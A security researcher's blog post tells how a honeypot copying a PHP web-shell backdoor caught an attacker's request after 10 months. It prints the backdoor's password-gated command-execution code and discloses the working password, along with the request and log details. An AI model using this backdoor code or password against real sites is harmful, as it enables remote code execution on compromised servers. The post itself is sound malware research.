I waited 10 months for you

Written by Benjamin Eriksson

29 January 2022

This is just a short story of how I set up a honeypot and waited 10 months for a single request. And a few days ago, I finally got it!

The story begins in early 2021 when I find a malware sample with the following code:

if(substr(sha1(md5($_POST['a'])),36)=='222f') {
  system(base64_decode($_POST['code']));
}

People familiar with my website might recognize this code from the Real Sec CTF. If you haven't solved the challenge yet you might want to check it out before I spoil the answer below. Indeed, many skilled people have already solved this challenge. This challenge has many possible solutions. In fact, all but two of the submitted solution are unique! The two being the same make sense as it was the smallest number resulting in the target truncated hash.

However, I was always annoyed that we could never know the true password, the password that the actual attackers would use. Therefore, after I found this malware, I created a file with the same filename and response on my website, but without the ability to execute code of course.

After seven months of radio silence, someone finally finds the file on my website! However, it's just an empty GET request, no passwords...
Then, after a total of 10 months, the request I've been waiting for arrives:

$_SERVER
(
    [REDIRECT_STATUS] => 200
    [HTTP_HOST] => 193.234.225.145
    [HTTP_X_REAL_IP] => 37.187.139.22
    [HTTP_X_FORWARDED_FOR] => 37.187.139.22
    [HTTP_CONNECTION] => close
    [HTTP_USER_AGENT] => curl/7.55.1
    [HTTP_ACCEPT] => */*
    [CONTENT_TYPE] => application/x-www-form-urlencoded
    [REQUEST_METHOD] => POST
    [QUERY_STRING] =>
    [REQUEST_URI] => /██████.php
    [REQUEST_TIME_FLOAT] => 1643162872.564
    [REQUEST_TIME] => 1643162872
)
$_POST
(
    [a] => just for fun
    [code] => ZGllKG1kNSgnZGlyJykpOw==
)

After all this time, the password the super hackers use is "just for fun"... Ok lets check it:

substr(sha1(md5("just for fun")), 36)
substr(sha1("bc00595440e801f8a5d2a2ad13b9791b"), 36)
substr("49843c6580a0abc8aa4576e6d14afe3d94e3222f", 36) == "222f"

I also checked if the attacker IP (37.187.139.22) tried anything else on my website. To my surprise, they only checked for this particular file. Furthermore, the three POST requests below are the only requests to this PHP file. Admittedly, I'm a bit mad that I missed the first request in March 2021 by one single day.

beneri.se.log:37.187.139.22 - - [26/Jan/2022:02:07:52 +0000] "POST /██████.php HTTP/1.0" 200 197 "-" "curl/7.55.1"
beneri.se.log.47:37.187.139.22 - - [02/Mar/2021:16:26:58 +0000] "POST /██████.php HTTP/1.0" 404 1689 "-" "curl/7.55.1"
beneri.se.log.52:37.187.139.22 - - [29/Jan/2021:06:51:30 +0000] "POST /██████.php HTTP/1.0" 404 1689 "-" "curl/7.55.1"

Searching for the md5 and sha1 hashes I found a great article about the history of this malware. I'd recommend checking out Finding Neutrino. Maybe you can even find the redacted filename 😉. Contrary to the article, the attacker in my case uses a different payload, die(md5('dir')); but it's quite similar to the payload mentioned in the article, i.e. die(md5(Ch3ck1ng)).

In summary, after I found a malware sample almost a year ago I created a honeypot and waited for 10 months until someone with knowledge about the malware tried to hack me, resulting in me learning more about the malware. What a thrill!

Write your comment!

Comments